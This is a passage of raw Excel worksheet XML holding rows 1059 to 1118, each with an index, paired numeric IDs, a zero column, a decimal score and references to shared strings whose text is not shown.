        <v>2090</v>
      </c>
      <c r="H1059" t="s">
        <v>2091</v>
      </c>
    </row>
    <row r="1060" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1060" s="1">
        <v>1058</v>
      </c>
      <c r="B1060">
        <v>2485</v>
      </c>
      <c r="C1060">
        <v>2485</v>
      </c>
      <c r="D1060">
        <v>0</v>
      </c>
      <c r="E1060">
        <v>0.64679998159408569</v>
      </c>
      <c r="F1060" t="s">
        <v>7</v>
      </c>
      <c r="G1060" t="s">
        <v>2092</v>
      </c>
      <c r="H1060" t="s">
        <v>2093</v>
      </c>
    </row>
    <row r="1061" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1061" s="1">
        <v>1059</v>
      </c>
      <c r="B1061">
        <v>6814</v>
      </c>
      <c r="C1061">
        <v>6814</v>
      </c>
      <c r="D1061">
        <v>0</v>
      </c>
      <c r="E1061">
        <v>0.71789997816085815</v>
      </c>
      <c r="F1061" t="s">
        <v>7</v>
      </c>
      <c r="G1061" t="s">
        <v>2094</v>
      </c>
      <c r="H1061" t="s">
        <v>2095</v>
      </c>
    </row>
    <row r="1062" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1062" s="1">
        <v>1060</v>
      </c>
      <c r="B1062">
        <v>4271</v>
      </c>
      <c r="C1062">
        <v>4271</v>
      </c>
      <c r="D1062">
        <v>0</v>
      </c>
      <c r="E1062">
        <v>0.97310000658035278</v>
      </c>
      <c r="F1062" t="s">
        <v>7</v>
      </c>
      <c r="G1062" t="s">
        <v>2096</v>
      </c>
      <c r="H1062" t="s">
        <v>2097</v>
      </c>
    </row>
    <row r="1063" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1063" s="1">
        <v>1061</v>
      </c>
      <c r="B1063">
        <v>2490</v>
      </c>
      <c r="C1063">
        <v>2490</v>
      </c>
      <c r="D1063">
        <v>0</v>
      </c>
      <c r="E1063">
        <v>0.82340002059936523</v>
      </c>
      <c r="F1063" t="s">
        <v>7</v>
      </c>
      <c r="G1063" t="s">
        <v>2098</v>
      </c>
      <c r="H1063" t="s">
        <v>2099</v>
      </c>
    </row>
    <row r="1064" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1064" s="1">
        <v>1062</v>
      </c>
      <c r="B1064">
        <v>6133</v>
      </c>
      <c r="C1064">
        <v>6133</v>
      </c>
      <c r="D1064">
        <v>0</v>
      </c>
      <c r="E1064">
        <v>0.53259998559951782</v>
      </c>
      <c r="F1064" t="s">
        <v>7</v>
      </c>
      <c r="G1064" t="s">
        <v>2100</v>
      </c>
      <c r="H1064" t="s">
        <v>2101</v>
      </c>
    </row>
    <row r="1065" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1065" s="1">
        <v>1063</v>
      </c>
      <c r="B1065">
        <v>4252</v>
      </c>
      <c r="C1065">
        <v>4252</v>
      </c>
      <c r="D1065">
        <v>0</v>
      </c>
      <c r="E1065">
        <v>0.8716999888420105</v>
      </c>
      <c r="F1065" t="s">
        <v>7</v>
      </c>
      <c r="G1065" t="s">
        <v>2102</v>
      </c>
      <c r="H1065" t="s">
        <v>2103</v>
      </c>
    </row>
    <row r="1066" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1066" s="1">
        <v>1064</v>
      </c>
      <c r="B1066">
        <v>2508</v>
      </c>
      <c r="C1066">
        <v>2508</v>
      </c>
      <c r="D1066">
        <v>0</v>
      </c>
      <c r="E1066">
        <v>0.99260002374649048</v>
      </c>
      <c r="F1066" t="s">
        <v>7</v>
      </c>
      <c r="G1066" t="s">
        <v>2104</v>
      </c>
      <c r="H1066" t="s">
        <v>2105</v>
      </c>
    </row>
    <row r="1067" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1067" s="1">
        <v>1065</v>
      </c>
      <c r="B1067">
        <v>2509</v>
      </c>
      <c r="C1067">
        <v>2509</v>
      </c>
      <c r="D1067">
        <v>0</v>
      </c>
      <c r="E1067">
        <v>0.98339998722076416</v>
      </c>
      <c r="F1067" t="s">
        <v>7</v>
      </c>
      <c r="G1067" t="s">
        <v>2106</v>
      </c>
      <c r="H1067" t="s">
        <v>2107</v>
      </c>
    </row>
    <row r="1068" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1068" s="1">
        <v>1066</v>
      </c>
      <c r="B1068">
        <v>2510</v>
      </c>
      <c r="C1068">
        <v>2510</v>
      </c>
      <c r="D1068">
        <v>0</v>
      </c>
      <c r="E1068">
        <v>0.87319999933242798</v>
      </c>
      <c r="F1068" t="s">
        <v>7</v>
      </c>
      <c r="G1068" t="s">
        <v>2108</v>
      </c>
      <c r="H1068" t="s">
        <v>2109</v>
      </c>
    </row>
    <row r="1069" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1069" s="1">
        <v>1067</v>
      </c>
      <c r="B1069">
        <v>2511</v>
      </c>
      <c r="C1069">
        <v>2511</v>
      </c>
      <c r="D1069">
        <v>0</v>
      </c>
      <c r="E1069">
        <v>0.99610000848770142</v>
      </c>
      <c r="F1069" t="s">
        <v>7</v>
      </c>
      <c r="G1069" t="s">
        <v>2110</v>
      </c>
      <c r="H1069" t="s">
        <v>2111</v>
      </c>
    </row>
    <row r="1070" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1070" s="1">
        <v>1068</v>
      </c>
      <c r="B1070">
        <v>2512</v>
      </c>
      <c r="C1070">
        <v>2512</v>
      </c>
      <c r="D1070">
        <v>0</v>
      </c>
      <c r="E1070">
        <v>0.66460001468658447</v>
      </c>
      <c r="F1070" t="s">
        <v>7</v>
      </c>
      <c r="G1070" t="s">
        <v>2112</v>
      </c>
      <c r="H1070" t="s">
        <v>2113</v>
      </c>
    </row>
    <row r="1071" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1071" s="1">
        <v>1069</v>
      </c>
      <c r="B1071">
        <v>2492</v>
      </c>
      <c r="C1071">
        <v>2492</v>
      </c>
      <c r="D1071">
        <v>0</v>
      </c>
      <c r="E1071">
        <v>0.52810001373291016</v>
      </c>
      <c r="F1071" t="s">
        <v>7</v>
      </c>
      <c r="G1071" t="s">
        <v>2114</v>
      </c>
      <c r="H1071" t="s">
        <v>2115</v>
      </c>
    </row>
    <row r="1072" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1072" s="1">
        <v>1070</v>
      </c>
      <c r="B1072">
        <v>2513</v>
      </c>
      <c r="C1072">
        <v>2513</v>
      </c>
      <c r="D1072">
        <v>0</v>
      </c>
      <c r="E1072">
        <v>0.52069997787475586</v>
      </c>
      <c r="F1072" t="s">
        <v>7</v>
      </c>
      <c r="G1072" t="s">
        <v>2116</v>
      </c>
      <c r="H1072" t="s">
        <v>2117</v>
      </c>
    </row>
    <row r="1073" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1073" s="1">
        <v>1071</v>
      </c>
      <c r="B1073">
        <v>2470</v>
      </c>
      <c r="C1073">
        <v>2470</v>
      </c>
      <c r="D1073">
        <v>0</v>
      </c>
      <c r="E1073">
        <v>0.84719997644424438</v>
      </c>
      <c r="F1073" t="s">
        <v>7</v>
      </c>
      <c r="G1073" t="s">
        <v>2118</v>
      </c>
      <c r="H1073" t="s">
        <v>2119</v>
      </c>
    </row>
    <row r="1074" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1074" s="1">
        <v>1072</v>
      </c>
      <c r="B1074">
        <v>2468</v>
      </c>
      <c r="C1074">
        <v>2468</v>
      </c>
      <c r="D1074">
        <v>0</v>
      </c>
      <c r="E1074">
        <v>0.99400001764297485</v>
      </c>
      <c r="F1074" t="s">
        <v>7</v>
      </c>
      <c r="G1074" t="s">
        <v>2120</v>
      </c>
      <c r="H1074" t="s">
        <v>2121</v>
      </c>
    </row>
    <row r="1075" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1075" s="1">
        <v>1073</v>
      </c>
      <c r="B1075">
        <v>2433</v>
      </c>
      <c r="C1075">
        <v>2433</v>
      </c>
      <c r="D1075">
        <v>0</v>
      </c>
      <c r="E1075">
        <v>0.55680000782012939</v>
      </c>
      <c r="F1075" t="s">
        <v>7</v>
      </c>
      <c r="G1075" t="s">
        <v>2122</v>
      </c>
      <c r="H1075" t="s">
        <v>2123</v>
      </c>
    </row>
    <row r="1076" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1076" s="1">
        <v>1074</v>
      </c>
      <c r="B1076">
        <v>6108</v>
      </c>
      <c r="C1076">
        <v>6108</v>
      </c>
      <c r="D1076">
        <v>0</v>
      </c>
      <c r="E1076">
        <v>0.86460000276565552</v>
      </c>
      <c r="F1076" t="s">
        <v>7</v>
      </c>
      <c r="G1076" t="s">
        <v>2124</v>
      </c>
      <c r="H1076" t="s">
        <v>2125</v>
      </c>
    </row>
    <row r="1077" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1077" s="1">
        <v>1075</v>
      </c>
      <c r="B1077">
        <v>6109</v>
      </c>
      <c r="C1077">
        <v>6109</v>
      </c>
      <c r="D1077">
        <v>0</v>
      </c>
      <c r="E1077">
        <v>0.99720001220703125</v>
      </c>
      <c r="F1077" t="s">
        <v>7</v>
      </c>
      <c r="G1077" t="s">
        <v>2126</v>
      </c>
      <c r="H1077" t="s">
        <v>2127</v>
      </c>
    </row>
    <row r="1078" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1078" s="1">
        <v>1076</v>
      </c>
      <c r="B1078">
        <v>4280</v>
      </c>
      <c r="C1078">
        <v>4280</v>
      </c>
      <c r="D1078">
        <v>0</v>
      </c>
      <c r="E1078">
        <v>0.98439997434616089</v>
      </c>
      <c r="F1078" t="s">
        <v>7</v>
      </c>
      <c r="G1078" t="s">
        <v>2128</v>
      </c>
      <c r="H1078" t="s">
        <v>2129</v>
      </c>
    </row>
    <row r="1079" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1079" s="1">
        <v>1077</v>
      </c>
      <c r="B1079">
        <v>6831</v>
      </c>
      <c r="C1079">
        <v>6831</v>
      </c>
      <c r="D1079">
        <v>0</v>
      </c>
      <c r="E1079">
        <v>0.85250002145767212</v>
      </c>
      <c r="F1079" t="s">
        <v>7</v>
      </c>
      <c r="G1079" t="s">
        <v>2130</v>
      </c>
      <c r="H1079" t="s">
        <v>2131</v>
      </c>
    </row>
    <row r="1080" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1080" s="1">
        <v>1078</v>
      </c>
      <c r="B1080">
        <v>2448</v>
      </c>
      <c r="C1080">
        <v>2448</v>
      </c>
      <c r="D1080">
        <v>0</v>
      </c>
      <c r="E1080">
        <v>0.99400001764297485</v>
      </c>
      <c r="F1080" t="s">
        <v>7</v>
      </c>
      <c r="G1080" t="s">
        <v>2132</v>
      </c>
      <c r="H1080" t="s">
        <v>2133</v>
      </c>
    </row>
    <row r="1081" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1081" s="1">
        <v>1079</v>
      </c>
      <c r="B1081">
        <v>6829</v>
      </c>
      <c r="C1081">
        <v>6829</v>
      </c>
      <c r="D1081">
        <v>0</v>
      </c>
      <c r="E1081">
        <v>0.77819997072219849</v>
      </c>
      <c r="F1081" t="s">
        <v>7</v>
      </c>
      <c r="G1081" t="s">
        <v>2134</v>
      </c>
      <c r="H1081" t="s">
        <v>2135</v>
      </c>
    </row>
    <row r="1082" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1082" s="1">
        <v>1080</v>
      </c>
      <c r="B1082">
        <v>4272</v>
      </c>
      <c r="C1082">
        <v>4272</v>
      </c>
      <c r="D1082">
        <v>0</v>
      </c>
      <c r="E1082">
        <v>0.99629998207092285</v>
      </c>
      <c r="F1082" t="s">
        <v>7</v>
      </c>
      <c r="G1082" t="s">
        <v>2136</v>
      </c>
      <c r="H1082" t="s">
        <v>2137</v>
      </c>
    </row>
    <row r="1083" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1083" s="1">
        <v>1081</v>
      </c>
      <c r="B1083">
        <v>6828</v>
      </c>
      <c r="C1083">
        <v>6828</v>
      </c>
      <c r="D1083">
        <v>0</v>
      </c>
      <c r="E1083">
        <v>0.53350001573562622</v>
      </c>
      <c r="F1083" t="s">
        <v>7</v>
      </c>
      <c r="G1083" t="s">
        <v>2138</v>
      </c>
      <c r="H1083" t="s">
        <v>2139</v>
      </c>
    </row>
    <row r="1084" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1084" s="1">
        <v>1082</v>
      </c>
      <c r="B1084">
        <v>6115</v>
      </c>
      <c r="C1084">
        <v>6115</v>
      </c>
      <c r="D1084">
        <v>0</v>
      </c>
      <c r="E1084">
        <v>0.99409997463226318</v>
      </c>
      <c r="F1084" t="s">
        <v>7</v>
      </c>
      <c r="G1084" t="s">
        <v>2140</v>
      </c>
      <c r="H1084" t="s">
        <v>2141</v>
      </c>
    </row>
    <row r="1085" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1085" s="1">
        <v>1083</v>
      </c>
      <c r="B1085">
        <v>4274</v>
      </c>
      <c r="C1085">
        <v>4274</v>
      </c>
      <c r="D1085">
        <v>0</v>
      </c>
      <c r="E1085">
        <v>0.97060000896453857</v>
      </c>
      <c r="F1085" t="s">
        <v>7</v>
      </c>
      <c r="G1085" t="s">
        <v>2142</v>
      </c>
      <c r="H1085" t="s">
        <v>2143</v>
      </c>
    </row>
    <row r="1086" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1086" s="1">
        <v>1084</v>
      </c>
      <c r="B1086">
        <v>2456</v>
      </c>
      <c r="C1086">
        <v>2456</v>
      </c>
      <c r="D1086">
        <v>0</v>
      </c>
      <c r="E1086">
        <v>0.54030001163482666</v>
      </c>
      <c r="F1086" t="s">
        <v>7</v>
      </c>
      <c r="G1086" t="s">
        <v>2144</v>
      </c>
      <c r="H1086" t="s">
        <v>2145</v>
      </c>
    </row>
    <row r="1087" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1087" s="1">
        <v>1085</v>
      </c>
      <c r="B1087">
        <v>2462</v>
      </c>
      <c r="C1087">
        <v>2462</v>
      </c>
      <c r="D1087">
        <v>0</v>
      </c>
      <c r="E1087">
        <v>0.83190000057220459</v>
      </c>
      <c r="F1087" t="s">
        <v>7</v>
      </c>
      <c r="G1087" t="s">
        <v>2146</v>
      </c>
      <c r="H1087" t="s">
        <v>2147</v>
      </c>
    </row>
    <row r="1088" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1088" s="1">
        <v>1086</v>
      </c>
      <c r="B1088">
        <v>2463</v>
      </c>
      <c r="C1088">
        <v>2463</v>
      </c>
      <c r="D1088">
        <v>0</v>
      </c>
      <c r="E1088">
        <v>0.9901999831199646</v>
      </c>
      <c r="F1088" t="s">
        <v>7</v>
      </c>
      <c r="G1088" t="s">
        <v>2148</v>
      </c>
      <c r="H1088" t="s">
        <v>2149</v>
      </c>
    </row>
    <row r="1089" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1089" s="1">
        <v>1087</v>
      </c>
      <c r="B1089">
        <v>2464</v>
      </c>
      <c r="C1089">
        <v>2464</v>
      </c>
      <c r="D1089">
        <v>0</v>
      </c>
      <c r="E1089">
        <v>0.99360001087188721</v>
      </c>
      <c r="F1089" t="s">
        <v>7</v>
      </c>
      <c r="G1089" t="s">
        <v>2150</v>
      </c>
      <c r="H1089" t="s">
        <v>2151</v>
      </c>
    </row>
    <row r="1090" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1090" s="1">
        <v>1088</v>
      </c>
      <c r="B1090">
        <v>2465</v>
      </c>
      <c r="C1090">
        <v>2465</v>
      </c>
      <c r="D1090">
        <v>0</v>
      </c>
      <c r="E1090">
        <v>0.98729997873306274</v>
      </c>
      <c r="F1090" t="s">
        <v>7</v>
      </c>
      <c r="G1090" t="s">
        <v>2152</v>
      </c>
      <c r="H1090" t="s">
        <v>2153</v>
      </c>
    </row>
    <row r="1091" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1091" s="1">
        <v>1089</v>
      </c>
      <c r="B1091">
        <v>2452</v>
      </c>
      <c r="C1091">
        <v>2452</v>
      </c>
      <c r="D1091">
        <v>0</v>
      </c>
      <c r="E1091">
        <v>0.49129998683929438</v>
      </c>
      <c r="F1091" t="s">
        <v>7</v>
      </c>
      <c r="G1091" t="s">
        <v>2154</v>
      </c>
      <c r="H1091" t="s">
        <v>2155</v>
      </c>
    </row>
    <row r="1092" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1092" s="1">
        <v>1090</v>
      </c>
      <c r="B1092">
        <v>2515</v>
      </c>
      <c r="C1092">
        <v>2515</v>
      </c>
      <c r="D1092">
        <v>0</v>
      </c>
      <c r="E1092">
        <v>0.42689999938011169</v>
      </c>
      <c r="F1092" t="s">
        <v>7</v>
      </c>
      <c r="G1092" t="s">
        <v>2156</v>
      </c>
      <c r="H1092" t="s">
        <v>2157</v>
      </c>
    </row>
    <row r="1093" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1093" s="1">
        <v>1091</v>
      </c>
      <c r="B1093">
        <v>2516</v>
      </c>
      <c r="C1093">
        <v>2516</v>
      </c>
      <c r="D1093">
        <v>0</v>
      </c>
      <c r="E1093">
        <v>0.79500001668930054</v>
      </c>
      <c r="F1093" t="s">
        <v>7</v>
      </c>
      <c r="G1093" t="s">
        <v>2158</v>
      </c>
      <c r="H1093" t="s">
        <v>2159</v>
      </c>
    </row>
    <row r="1094" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1094" s="1">
        <v>1092</v>
      </c>
      <c r="B1094">
        <v>2519</v>
      </c>
      <c r="C1094">
        <v>2519</v>
      </c>
      <c r="D1094">
        <v>0</v>
      </c>
      <c r="E1094">
        <v>0.88090002536773682</v>
      </c>
      <c r="F1094" t="s">
        <v>7</v>
      </c>
      <c r="G1094" t="s">
        <v>2160</v>
      </c>
      <c r="H1094" t="s">
        <v>2161</v>
      </c>
    </row>
    <row r="1095" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1095" s="1">
        <v>1093</v>
      </c>
      <c r="B1095">
        <v>2563</v>
      </c>
      <c r="C1095">
        <v>2563</v>
      </c>
      <c r="D1095">
        <v>0</v>
      </c>
      <c r="E1095">
        <v>0.94199997186660767</v>
      </c>
      <c r="F1095" t="s">
        <v>7</v>
      </c>
      <c r="G1095" t="s">
        <v>2162</v>
      </c>
      <c r="H1095" t="s">
        <v>2163</v>
      </c>
    </row>
    <row r="1096" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1096" s="1">
        <v>1094</v>
      </c>
      <c r="B1096">
        <v>2565</v>
      </c>
      <c r="C1096">
        <v>2565</v>
      </c>
      <c r="D1096">
        <v>0</v>
      </c>
      <c r="E1096">
        <v>0.72560000419616699</v>
      </c>
      <c r="F1096" t="s">
        <v>7</v>
      </c>
      <c r="G1096" t="s">
        <v>2164</v>
      </c>
      <c r="H1096" t="s">
        <v>2165</v>
      </c>
    </row>
    <row r="1097" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1097" s="1">
        <v>1095</v>
      </c>
      <c r="B1097">
        <v>2567</v>
      </c>
      <c r="C1097">
        <v>2567</v>
      </c>
      <c r="D1097">
        <v>0</v>
      </c>
      <c r="E1097">
        <v>0.91900002956390381</v>
      </c>
      <c r="F1097" t="s">
        <v>7</v>
      </c>
      <c r="G1097" t="s">
        <v>2166</v>
      </c>
      <c r="H1097" t="s">
        <v>2167</v>
      </c>
    </row>
    <row r="1098" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1098" s="1">
        <v>1096</v>
      </c>
      <c r="B1098">
        <v>2568</v>
      </c>
      <c r="C1098">
        <v>2568</v>
      </c>
      <c r="D1098">
        <v>0</v>
      </c>
      <c r="E1098">
        <v>0.56480002403259277</v>
      </c>
      <c r="F1098" t="s">
        <v>7</v>
      </c>
      <c r="G1098" t="s">
        <v>2168</v>
      </c>
      <c r="H1098" t="s">
        <v>2169</v>
      </c>
    </row>
    <row r="1099" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1099" s="1">
        <v>1097</v>
      </c>
      <c r="B1099">
        <v>2569</v>
      </c>
      <c r="C1099">
        <v>2569</v>
      </c>
      <c r="D1099">
        <v>0</v>
      </c>
      <c r="E1099">
        <v>0.71439999341964722</v>
      </c>
      <c r="F1099" t="s">
        <v>7</v>
      </c>
      <c r="G1099" t="s">
        <v>2170</v>
      </c>
      <c r="H1099" t="s">
        <v>2171</v>
      </c>
    </row>
    <row r="1100" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1100" s="1">
        <v>1098</v>
      </c>
      <c r="B1100">
        <v>4215</v>
      </c>
      <c r="C1100">
        <v>4215</v>
      </c>
      <c r="D1100">
        <v>0</v>
      </c>
      <c r="E1100">
        <v>0.64789998531341553</v>
      </c>
      <c r="F1100" t="s">
        <v>7</v>
      </c>
      <c r="G1100" t="s">
        <v>2172</v>
      </c>
      <c r="H1100" t="s">
        <v>2173</v>
      </c>
    </row>
    <row r="1101" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1101" s="1">
        <v>1099</v>
      </c>
      <c r="B1101">
        <v>4211</v>
      </c>
      <c r="C1101">
        <v>4211</v>
      </c>
      <c r="D1101">
        <v>0</v>
      </c>
      <c r="E1101">
        <v>0.98329997062683105</v>
      </c>
      <c r="F1101" t="s">
        <v>7</v>
      </c>
      <c r="G1101" t="s">
        <v>2174</v>
      </c>
      <c r="H1101" t="s">
        <v>2175</v>
      </c>
    </row>
    <row r="1102" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1102" s="1">
        <v>1100</v>
      </c>
      <c r="B1102">
        <v>2562</v>
      </c>
      <c r="C1102">
        <v>2562</v>
      </c>
      <c r="D1102">
        <v>0</v>
      </c>
      <c r="E1102">
        <v>0.95899999141693115</v>
      </c>
      <c r="F1102" t="s">
        <v>7</v>
      </c>
      <c r="G1102" t="s">
        <v>2176</v>
      </c>
      <c r="H1102" t="s">
        <v>2177</v>
      </c>
    </row>
    <row r="1103" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1103" s="1">
        <v>1101</v>
      </c>
      <c r="B1103">
        <v>2583</v>
      </c>
      <c r="C1103">
        <v>2583</v>
      </c>
      <c r="D1103">
        <v>0</v>
      </c>
      <c r="E1103">
        <v>0.506600022315979</v>
      </c>
      <c r="F1103" t="s">
        <v>7</v>
      </c>
      <c r="G1103" t="s">
        <v>2178</v>
      </c>
      <c r="H1103" t="s">
        <v>2179</v>
      </c>
    </row>
    <row r="1104" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1104" s="1">
        <v>1102</v>
      </c>
      <c r="B1104">
        <v>6772</v>
      </c>
      <c r="C1104">
        <v>6772</v>
      </c>
      <c r="D1104">
        <v>0</v>
      </c>
      <c r="E1104">
        <v>0.80519998073577881</v>
      </c>
      <c r="F1104" t="s">
        <v>7</v>
      </c>
      <c r="G1104" t="s">
        <v>2180</v>
      </c>
      <c r="H1104" t="s">
        <v>2181</v>
      </c>
    </row>
    <row r="1105" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1105" s="1">
        <v>1103</v>
      </c>
      <c r="B1105">
        <v>6156</v>
      </c>
      <c r="C1105">
        <v>6156</v>
      </c>
      <c r="D1105">
        <v>0</v>
      </c>
      <c r="E1105">
        <v>0.66149997711181641</v>
      </c>
      <c r="F1105" t="s">
        <v>7</v>
      </c>
      <c r="G1105" t="s">
        <v>2182</v>
      </c>
      <c r="H1105" t="s">
        <v>2183</v>
      </c>
    </row>
    <row r="1106" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1106" s="1">
        <v>1104</v>
      </c>
      <c r="B1106">
        <v>6770</v>
      </c>
      <c r="C1106">
        <v>6770</v>
      </c>
      <c r="D1106">
        <v>0</v>
      </c>
      <c r="E1106">
        <v>0.94580000638961792</v>
      </c>
      <c r="F1106" t="s">
        <v>7</v>
      </c>
      <c r="G1106" t="s">
        <v>2184</v>
      </c>
      <c r="H1106" t="s">
        <v>2185</v>
      </c>
    </row>
    <row r="1107" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1107" s="1">
        <v>1105</v>
      </c>
      <c r="B1107">
        <v>2594</v>
      </c>
      <c r="C1107">
        <v>2594</v>
      </c>
      <c r="D1107">
        <v>0</v>
      </c>
      <c r="E1107">
        <v>0.45989999175071722</v>
      </c>
      <c r="F1107" t="s">
        <v>7</v>
      </c>
      <c r="G1107" t="s">
        <v>2186</v>
      </c>
      <c r="H1107" t="s">
        <v>2187</v>
      </c>
    </row>
    <row r="1108" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1108" s="1">
        <v>1106</v>
      </c>
      <c r="B1108">
        <v>4198</v>
      </c>
      <c r="C1108">
        <v>4198</v>
      </c>
      <c r="D1108">
        <v>0</v>
      </c>
      <c r="E1108">
        <v>0.98949998617172241</v>
      </c>
      <c r="F1108" t="s">
        <v>7</v>
      </c>
      <c r="G1108" t="s">
        <v>2188</v>
      </c>
      <c r="H1108" t="s">
        <v>2189</v>
      </c>
    </row>
    <row r="1109" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1109" s="1">
        <v>1107</v>
      </c>
      <c r="B1109">
        <v>4197</v>
      </c>
      <c r="C1109">
        <v>4197</v>
      </c>
      <c r="D1109">
        <v>0</v>
      </c>
      <c r="E1109">
        <v>0.98640000820159912</v>
      </c>
      <c r="F1109" t="s">
        <v>7</v>
      </c>
      <c r="G1109" t="s">
        <v>2190</v>
      </c>
      <c r="H1109" t="s">
        <v>2191</v>
      </c>
    </row>
    <row r="1110" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1110" s="1">
        <v>1108</v>
      </c>
      <c r="B1110">
        <v>6764</v>
      </c>
      <c r="C1110">
        <v>6764</v>
      </c>
      <c r="D1110">
        <v>0</v>
      </c>
      <c r="E1110">
        <v>0.63090002536773682</v>
      </c>
      <c r="F1110" t="s">
        <v>7</v>
      </c>
      <c r="G1110" t="s">
        <v>2192</v>
      </c>
      <c r="H1110" t="s">
        <v>2193</v>
      </c>
    </row>
    <row r="1111" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1111" s="1">
        <v>1109</v>
      </c>
      <c r="B1111">
        <v>6773</v>
      </c>
      <c r="C1111">
        <v>6773</v>
      </c>
      <c r="D1111">
        <v>0</v>
      </c>
      <c r="E1111">
        <v>0.5153999924659729</v>
      </c>
      <c r="F1111" t="s">
        <v>7</v>
      </c>
      <c r="G1111" t="s">
        <v>2194</v>
      </c>
      <c r="H1111" t="s">
        <v>2195</v>
      </c>
    </row>
    <row r="1112" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1112" s="1">
        <v>1110</v>
      </c>
      <c r="B1112">
        <v>4222</v>
      </c>
      <c r="C1112">
        <v>4222</v>
      </c>
      <c r="D1112">
        <v>0</v>
      </c>
      <c r="E1112">
        <v>0.87209999561309814</v>
      </c>
      <c r="F1112" t="s">
        <v>7</v>
      </c>
      <c r="G1112" t="s">
        <v>2196</v>
      </c>
      <c r="H1112" t="s">
        <v>2197</v>
      </c>
    </row>
    <row r="1113" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1113" s="1">
        <v>1111</v>
      </c>
      <c r="B1113">
        <v>2560</v>
      </c>
      <c r="C1113">
        <v>2560</v>
      </c>
      <c r="D1113">
        <v>0</v>
      </c>
      <c r="E1113">
        <v>0.46039998531341553</v>
      </c>
      <c r="F1113" t="s">
        <v>7</v>
      </c>
      <c r="G1113" t="s">
        <v>2198</v>
      </c>
      <c r="H1113" t="s">
        <v>2199</v>
      </c>
    </row>
    <row r="1114" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1114" s="1">
        <v>1112</v>
      </c>
      <c r="B1114">
        <v>2558</v>
      </c>
      <c r="C1114">
        <v>2558</v>
      </c>
      <c r="D1114">
        <v>0</v>
      </c>
      <c r="E1114">
        <v>0.99610000848770142</v>
      </c>
      <c r="F1114" t="s">
        <v>7</v>
      </c>
      <c r="G1114" t="s">
        <v>2200</v>
      </c>
      <c r="H1114" t="s">
        <v>2201</v>
      </c>
    </row>
    <row r="1115" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1115" s="1">
        <v>1113</v>
      </c>
      <c r="B1115">
        <v>2520</v>
      </c>
      <c r="C1115">
        <v>2520</v>
      </c>
      <c r="D1115">
        <v>0</v>
      </c>
      <c r="E1115">
        <v>0.97729998826980591</v>
      </c>
      <c r="F1115" t="s">
        <v>7</v>
      </c>
      <c r="G1115" t="s">
        <v>2202</v>
      </c>
      <c r="H1115" t="s">
        <v>2203</v>
      </c>
    </row>
    <row r="1116" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1116" s="1">
        <v>1114</v>
      </c>
      <c r="B1116">
        <v>2521</v>
      </c>
      <c r="C1116">
        <v>2521</v>
      </c>
      <c r="D1116">
        <v>0</v>
      </c>
      <c r="E1116">
        <v>0.72939997911453247</v>
      </c>
      <c r="F1116" t="s">
        <v>7</v>
      </c>
      <c r="G1116" t="s">
        <v>2204</v>
      </c>
      <c r="H1116" t="s">
        <v>2205</v>
      </c>
    </row>
    <row r="1117" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1117" s="1">
        <v>1115</v>
      </c>
      <c r="B1117">
        <v>2524</v>
      </c>
      <c r="C1117">
        <v>2524</v>
      </c>
      <c r="D1117">
        <v>0</v>
      </c>
      <c r="E1117">
        <v>0.5218999981880188</v>
      </c>
      <c r="F1117" t="s">
        <v>7</v>
      </c>
      <c r="G1117" t="s">
        <v>2206</v>
      </c>
      <c r="H1117" t="s">
        <v>2207</v>
      </c>
    </row>
    <row r="1118" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A1118" s="1">
        <v>1116</v>
      </c>
      <c r="B1118">
        <v>6140</v>
      </c>
      <c r="C1118">
